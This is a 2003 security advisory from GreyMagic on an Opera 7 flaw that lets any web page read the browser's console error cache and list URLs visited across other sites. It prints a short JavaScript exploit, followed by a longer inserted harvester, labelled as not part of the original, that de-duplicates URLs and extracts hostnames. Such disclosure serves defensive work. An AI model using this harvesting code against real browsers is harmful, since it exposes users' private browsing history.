GreyMagic Security Advisory GM#006-OP
=====================================

By GreyMagic Software, Israel.
04 Feb 2003.

Available in HTML format at http://security.greymagic.com/adv/gm006-op/.

Topic: Sniffing Opera's Tracks.

Discovery date: 29 Jan 2003.

Affected applications:
======================

Opera 7 (final).

Introduction:
=============

Opera recently released a new version of its browser. The new browser features a very useful JavaScript console, which is built on a few methods Opera implemented in the browser-specific "opera" object.

Discussion:
===========

These methods are documented in the comments of the console's "console.html" file as follows:

* opera.errorIndex(): Returns the index of the last error message. This index is monotonically increasing (which limits us to about 2^53 errors per Opera session).

* opera.errorMessage(i): Returns the error message at index i. The value returned may be #f, if that message has been flushed from the cache.

(#f in the comment above denotes a false value.)

Opera did not restrict these methods to any particular origin or privilege level; they are available to any web page. At first glance this does not appear to be a big deal, but a short inspection of the generated error messages reveals that each of them contains the URL of the document that threw the exception.

In practice, this means that a web page can extract a list of all URLs the user has visited during the current Opera session that threw any exception, across every site and window, without any same-origin check. And since Opera identifies itself as Internet Explorer by default, it is frequently served IE-specific scripts that raise errors, so the console cache fills up quickly.

Harvesting visited URLs had never been this simple.

Exploit:
========

The following code will generate a list of visited URLs:

    // Walk the console's error cache from index 0 up to the current index.
    var sMsg, sFinal="", iLen=opera.errorIndex();
    for (var iErr=0;iErr<iLen;iErr++) {
        sMsg=opera.errorMessage(iErr);
        // Flushed entries return a false value and are skipped; from the
        // others, pull out the URL of the document that threw the error.
        if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n";
    }
    alert(sFinal);

Demonstration:
==============

A proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm006-op/.
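The following is an added example, not part of the original advisory and not GreyMagic's code, showing the harvesting technique above in a form that can be run outside Opera. Because the "opera" object only exists inside the browser, the harvester takes errorIndex/errorMessage as parameters and is exercised against a constructed stub; the message text used in the stub is an assumption made for illustration (the advisory only states that each message contains the URL that threw). Unlike the one-liner above it walks the cache up to and including errorIndex() (which the console.html comment describes as the index of the last message), tolerates flushed entries, strips trailing punctuation from matched URLs, de-duplicates the result, and reduces it to the list of visited hostnames an attacker would actually be after.

```javascript
// Added example: harvesting visited URLs from Opera 7 console messages.
// The Opera-specific "opera" object does not exist outside the browser, so
// the harvester receives the two console methods as parameters and is driven
// here by a constructed stub. The message format in SAMPLE_MESSAGES is an
// assumption for illustration; the advisory only says each message contains
// the URL of the document that threw.

// Extract every http(s) URL from one console message. Trailing punctuation
// that commonly follows a URL in prose (",", ".", ";", ")") is stripped.
function extractUrls(msg) {
  const found = [];
  const re = /https?:\/\/[^\s"'<>]+/gi;
  let m;
  while ((m = re.exec(msg)) !== null) {
    found.push(m[0].replace(/[),.;]+$/, ""));
  }
  return found;
}

// Walk the console cache the way the advisory's exploit does, but include the
// last index, skip flushed entries (errorMessage() returns a false value for
// them) and return distinct URLs in first-seen order.
function harvestUrls(errorIndex, errorMessage) {
  const seen = new Set();
  const urls = [];
  const last = errorIndex();
  for (let i = 0; i <= last; i++) {
    const msg = errorMessage(i);
    if (!msg) continue; // flushed from the cache
    for (const u of extractUrls(msg)) {
      if (!seen.has(u)) {
        seen.add(u);
        urls.push(u);
      }
    }
  }
  return urls;
}

// Reduce harvested URLs to distinct hostnames (which sites were visited).
function hostnames(urls) {
  const hosts = new Set();
  for (const u of urls) {
    try { hosts.add(new URL(u).hostname); } catch (e) { /* skip malformed */ }
  }
  return [...hosts];
}

// Constructed stub standing in for opera.errorIndex()/opera.errorMessage().
// The third entry shows why this matters: the leaked URL carries a query
// string from an internal application the attacker's page could never load.
const SAMPLE_MESSAGES = [
  "JavaScript - http://www.example.com/index.html\nEvent thread: onload\n" +
    "Error: name 'document.all' is undefined",
  null, // entry flushed from the cache
  "JavaScript - https://intranet.example.org/hr/payroll.html?emp=42\n" +
    "Error: Statement on line 12: Type mismatch",
  "JavaScript - http://www.example.com/index.html\n" +
    "Error: Statement on line 7: Reference to undefined variable",
];
const stubOpera = {
  errorIndex: () => SAMPLE_MESSAGES.length - 1,
  errorMessage: (i) => SAMPLE_MESSAGES[i],
};

if (typeof require !== "undefined" && require.main === module) {
  const urls = harvestUrls(stubOpera.errorIndex, stubOpera.errorMessage);
  console.log("Visited URLs:\n" + urls.join("\n"));
  console.log("Hosts:\n" + hostnames(urls).join("\n"));
}
```

Run it with node to see the two distinct URLs and two hostnames recovered from the four cache slots; in Opera 7 itself the same harvester would be called as harvestUrls(opera.errorIndex, opera.errorMessage) from any page, which is the whole problem.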
Solution:
=========

Until a patch becomes available, disable JavaScript by going to: File -> Preferences -> Multimedia, and uncheck the "Enable JavaScript" item.

Tested on:
==========

Opera 7 NT4.
Opera 7 Win98.
Opera 7 Win2000.
Opera 7 WinXP.

Disclaimer:
===========

The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright © 2003 GreyMagic Software.